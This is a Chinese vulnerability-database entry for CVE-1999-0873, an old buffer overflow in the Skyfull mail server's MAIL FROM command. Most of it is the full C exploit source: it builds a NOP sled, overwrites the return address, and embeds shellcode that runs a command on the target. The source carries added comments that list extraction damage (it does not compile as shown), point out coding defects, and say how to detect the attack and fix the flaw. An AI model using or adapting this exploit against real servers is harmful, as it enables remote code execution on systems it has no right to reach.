Skyfull邮件服务器 MAIL FROM缓冲区溢出漏洞
漏洞ID | 1105583 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-10-30 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0873 |
CNNVD-ID | CNNVD-199910-055 |
漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Skyfull邮件服务器存在缓冲区溢出漏洞。攻击者可以借助 MAIL FROM 指令的超长参数触发该漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/759/info
The Skyfull mail server version 1.1.4 has an unchecked buffer into which the argument from the MAIL FROM command is placed. This buffer can be overwritten and arbitrary code can be executed.
/*=============================================================================
Skyfull Mail Server Version 1.1.4 Exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN ([email protected])
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
/*
 * Layout constants for the oversized MAIL FROM argument that main() builds
 * in buf[]. All offsets are byte positions inside buf.
 *   MAXBUF      length of the argument (mostly 0x90 filler)
 *   RETADR      offset where a 4-byte address is written; the name suggests
 *               this is where the saved return address lands
 *   JMPADR      offset of a 2-byte short jump placed just below RETADR
 *   SMTP_PORT   TCP port the client connects to
 *   JMPEAX_ADR  the address stored at RETADR; a hard-coded value for one
 *               specific Windows/DLL build, which ties the code to that setup
 */
#define MAXBUF 3000
#define RETADR 655
#define JMPADR 651
#define SMTP_PORT 25
#define JMPEAX_ADR 0xbfe0a035
/*
 * Raw payload bytes: 58 bytes including the trailing 0x00, which lets the
 * str* calls in main() measure and extend the array. main() overwrites the
 * four bytes at [0x0d..0x10] and at [0x1e..0x21] with the addresses of
 * LoadLibrary and GetProcAddress as resolved in *this* process, then appends
 * cmdbuf. Because those addresses come from the local machine, the payload
 * only makes sense against a target whose system DLLs are mapped at the same
 * addresses -- one reason such code rarely transfers between builds.
 */
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
/* Dotted string of library, function and command names that main() appends
 * to exploit_code (fits: 58 + 29 bytes in a 200-byte array). How the payload
 * splits it up is left to the raw bytes above and is not documented here. */
unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";
/*
 * Entry point. Connects to argv[1] on SMTP_PORT, reads the banner, sends a
 * HELO, then sends one MAIL FROM command whose argument is the MAXBUF-byte
 * buf[] (0x90 filler with the payload and the address overwrite embedded at
 * fixed offsets) and disconnects without waiting for a reply.
 *
 * Defects visible in this listing, left as they are:
 *  - the string literals have lost their backslashes in extraction
 *    ("...n" / "...rn" endings, unescaped quotes around %s on the two
 *    "Reply from" lines) and the address inside the MAIL FROM format string
 *    was mangled by site-side e-mail obfuscation, so the file does not
 *    compile as shown;
 *  - buf[MAXBUF]=0 stores one byte past the end of buf[MAXBUF] (UB), and the
 *    %s in the MAIL FROM sprintf relies on that out-of-bounds NUL;
 *  - recv() results are never checked and packetbuf is not NUL-terminated
 *    before being printed with %s;
 *  - strlen/strcat/memcpy are applied to unsigned char arrays and main()
 *    has no return type (pre-C99 implicit int).
 *
 * From the defender's side the request is easy to characterise: a single
 * MAIL FROM whose argument is roughly 3 KB and almost entirely 0x90 bytes.
 * The underlying fix is a length check on the command argument before it is
 * copied into a fixed-size buffer.
 */
main(int argc,char *argv[])
{
SOCKET sock;
SOCKADDR_IN addr;
WSADATA wsa;
WORD wVersionRequested;
unsigned int ip,p1,p2;
/* buf: the MAIL FROM argument; packetbuf: one SMTP line / one reply.
 * Both are static, so they start zeroed. */
static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
struct hostent *hs;
if (argc<2){
printf("usage: %s VictimHostn",argv[0]); return -1;
}
wVersionRequested = MAKEWORD( 2, 0 );
if (WSAStartup(wVersionRequested , &wsa)!=0){
printf("Winsock Initialization failed.n"); return -1;
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
printf("Can not create socket.n"); return -1;
}
addr.sin_family = AF_INET;
addr.sin_port = htons((u_short)SMTP_PORT);
/* argv[1] is tried as a dotted quad first; -1 (INADDR_NONE) means fall
 * back to a name lookup. */
if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.n"); return -1;
}
addr.sin_family = hs->h_addrtype;
memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
printf("Can not connect to specified host.n"); return -1;
}
/* Banner read: return value ignored, no terminator guaranteed for the %s
 * below beyond the zero-initialised tail of the static array. */
recv(sock,packetbuf,MAXBUF,0);
printf("BANNER FROM "%s" : %sn",argv[1],packetbuf);
/* Fill with 0x90 (x86 NOP). The second store is at index MAXBUF, one past
 * the end of buf -- an out-of-bounds write. */
memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
/* Little-endian store of JMPEAX_ADR at RETADR. */
ip=JMPEAX_ADR;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
/* 0xEB 0x80 encodes a short backward jump (rel8 = -128) placed four bytes
 * below RETADR; the payload is copied to end right before it. */
buf[JMPADR ]=0xeb;
buf[JMPADR+1]=0x80;
strcat(exploit_code,cmdbuf);
/* API addresses are taken from this process, then patched into the payload
 * at fixed indices; they are only meaningful if the target maps kernel32
 * at the same addresses. */
p1=(unsigned int)LoadLibrary;
p2=(unsigned int)GetProcAddress;
exploit_code[0x0d]=p1&0xff;
exploit_code[0x0e]=(p1>>8)&0xff;
exploit_code[0x0f]=(p1>>16)&0xff;
exploit_code[0x10]=(p1>>24)&0xff;
exploit_code[0x1e]=p2&0xff;
exploit_code[0x1f]=(p2>>8)&0xff;
exploit_code[0x20]=(p2>>16)&0xff;
exploit_code[0x21]=(p2>>24)&0xff;
/* Payload occupies [JMPADR-len-1, JMPADR-1); everything else stays 0x90. */
memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code));
sprintf(packetbuf,"HELO UNYUNn");
send(sock,packetbuf,strlen(packetbuf),0);
/* Same unchecked recv / unterminated %s pattern as for the banner. */
recv(sock,packetbuf,MAXBUF,0);
printf("HELO: Reply from "%s" : %sn",argv[1],packetbuf);
/* The whole of buf becomes the MAIL FROM argument; %s reads until the
 * first NUL, i.e. it depends on the out-of-bounds store above.
 * packetbuf is MAXBUF+1000 bytes so the surrounding text fits. */
sprintf(packetbuf,"MAIL FROM: UNYUN <%[email protected]>rn",buf);
send(sock,packetbuf,strlen(packetbuf),0);
/* No reply is read; the connection is simply dropped. */
closesocket(sock);
printf("Done.n");
return FALSE;
}
|参考资料
来源:BID
名称:759
链接:http://www.securityfocus.com/bid/759